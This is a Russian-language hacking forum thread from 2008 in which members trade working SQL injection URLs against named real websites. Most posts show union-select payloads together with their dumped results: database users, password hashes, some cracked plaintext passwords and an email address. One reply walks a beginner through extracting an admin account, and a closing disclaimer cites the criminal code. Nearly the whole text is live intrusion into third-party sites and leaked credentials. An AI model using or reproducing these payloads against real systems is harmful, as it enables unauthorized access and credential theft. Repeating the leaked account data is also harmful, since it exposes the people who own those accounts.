22.05.2008, 22:03
|
|
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
С нами:
9847919
Репутация:
1446
|
|
rib-racers.com
Код:
http://www.rib-racers.com/index.php?id=-2+union+select+1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10/*
5.0.45-log�ribs@cgi1203.int.bizland.net�ribs
Код:
http://www.rib-racers.com/index.php?id=-2+union+select+1,concat_ws(0x3,fname,sname,username,password),3,4,5,6,7,8,9,10+from+reg/*
Peter�Johnson�bloggs�3823a5ee1f831626:peter
|
|
|
22.05.2008, 22:47
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами:
9920546
Репутация:
1796
|
|
Вот три хоста на одном сервере
binar-design.biz
Код:
http://binar-design.biz/web/index.php?idk=5-1 AND 1=0 UNION SELECT 1,2,COUNT(CONCAT_WS(0x203a20,TABLE_SCHEMA,TABLE_NAME)),4,5,6 FROM INFORMATION_SCHEMA.TABLES-- f
в бд никаких полезных таблиц нету 
mobilka.com.ua
Код:
http://mobilka.com.ua/games/download.php?id=393-1 AND 1=0 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13-- d
полезная таблица user в ней столбцы id,login,pass но похоже она пустая =\
samba.org.ua
Код:
http://samba.org.ua/articles/?section=2-1 AND 1=0 UNION SELECT 1,2,COUNT(CONCAT_WS(0x203A20,TABLE_SCHEMA,TABLE_NAME)),4 FROM INFORMATION_SCHEMA.TABLES-- f
это уже интереснее, три таблицы с юзерами:
1) user пустая
2) sis_users вот отседа:
Код:
Guest : Guest :
Petro : 6216f8a75fd5bb3d5f22b6f9958cdede3fc086c2 (111)
Vlas : 011c945f30ce2cbafc452f39840f025693339c42 (1111)
3) users из этой таблицы:
Код:
Vlas : 2a062126ee92cb96a03bef1eb1008c4d (armagedon)
tema_c : 698d51a19d8a121ce581499d7b701668 (111)
Uncnovn : 3f230640b78d7e71ac5514e57935eb69 (qazxsw)
__________________
Кто я?..
|
|
|
|
23.05.2008, 01:14
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами:
9851426
Репутация:
3908
|
|
http://www.ub.bw
Код:
http://www.ub.bw/news.cfm?pid=221&t=-1+union+select+1,2,concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user/*
root:*523D4E56011212768221213AC39698CEC334CD28
ubcms:3f29838236c2615f
webadmin:*B3AD4B00674739CBE6300BA8A38EBB04C6A1526A
webadmin:5c42f6195bd93698
mysql:*E74858DB86EBA20BC33D0AECAE8A8108C56B17FA
|
|
|
|
23.05.2008, 03:48
|
|
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
С нами:
9847919
Репутация:
1446
|
|
chtoikak.com
Код:
http://chtoikak.com/index.php?id=882+union+select+1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8/*
4.1.22-standard�optimasi_bw@localhost�optimasi_BeautyWorl d
Код:
http://chtoikak.com/index.php?id=882+union+select+1,concat(user,0x3,pass),3,4,5,6,7,8+from+users+limit+1,1/*
admin�admin ^^
Код:
http://chtoikak.com/index.php?id=882+union+select+1,concat_ws(0x3,login,passw,email),3,4,5,6,7,8+from+reg+limit+1,1/*
vlapron�260561954�vlapron@bk.ru
|
|
|
|
23.05.2008, 16:01
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами:
9851426
Репутация:
3908
|
|
http://www.mnsafetycouncil.org PR:5
Код:
http://www.mnsafetycouncil.org/products/product.cfm?PID=1+or+1=(SELECT+TOP+1+cast(LoginName+as+nvarchar)%2Bchar(58)%2Bcast(Password+as+nvarchar)+from+users)--
|
|
|
|
23.05.2008, 18:14
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами:
9838057
Репутация:
302
|
|
Http://npo.karelia.ru/ скока не копался ничего кроме
Результаты поиска
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''''' at line 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or e_text_full like '%'''%'' at line 1
Вы искали - '''
Совпадений не найдено, попробуйте изменить искомое слово.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or e_text_full like '%'''%' ORDER BY e_id DESC limit 0,15' at line 1
Может кто пограмотнее поможет!
А я так просто учусь.. пока мало чего понимаю. Может подскажите сайтик на котором попрактиковатся можно..
|
|
|
|
23.05.2008, 19:51
|
|
Познающий
Регистрация: 13.04.2008
Сообщений: 42
С нами:
9513970
Репутация:
35
|
|
to Assembler:
http://npo.karelia.ru/?view=event&id=0+union+select+1,concat_ws(0x3,vers ion(),user(),database()),3/*
http://npo.karelia.ru/?view=event&id=0+union+select+1,concat(u_name,0x3, u_pass),3+from+vs_users/*
http://npo.karelia.ru/admin
PS: и не фурыкает чет, мож кто абразумит почему 
|
|
|
|
23.05.2008, 19:56
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами:
10077446
Репутация:
3965
|
|
Сообщение от mefish
to Assembler:
http://npo.karelia.ru/admin
PS: и не фурыкает чет, мож кто абразумит почему
там бейсик авторризация. Скорее всего с базой не связано
__________________
BlackHat. MoDL
|
|
|
|
23.05.2008, 19:31
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами:
9851426
Репутация:
3908
|
|
http://www.thefrantics.com/
Код:
http://www.thefrantics.com/index.cfm?PID=1+or+1=(SELECT+TOP+1+cast(Username+as+nvarchar)%2Bchar(58)%2Bcast(Password+as+nvarchar)+from+Users)--
|
|
|
|
23.05.2008, 20:04
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
С нами:
10242288
Репутация:
536
|
|
2 Assembler, не знаю насчет поиска (проверять лениво было), но на сайте была лобовая инъекция в параметре id в index.php. Вот, кстати, и она:
Код:
http://npo.karelia.ru/?view=event&id=-1+UNION+SELECT+VERSION(),2,3/*
Версия БД 5 - можно свободно извлечь таблицы и столбцы.
Идем дальше: самой интересной таблицей, на мой взгляд, является "org.vs_users" с полями "u_id", "u_name", "u_pass", "u_level". Делаем запрос:
Код:
http://npo.karelia.ru/?view=event&id=-1+UNION+SELECT+concat_ws(0x3a,u_id,u_name,u_pass,u_level),2,3+FROM+org.vs_users/*
Видим аккаунт администратора, где пароль в незашифрованном виде:
Вот и все... Получился даже мини-FAQ  .
P.S. Лучше служить закону, чем нарушать его, взлом - зло! Помни о 272 статье УК РФ и о моральных принципах! |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
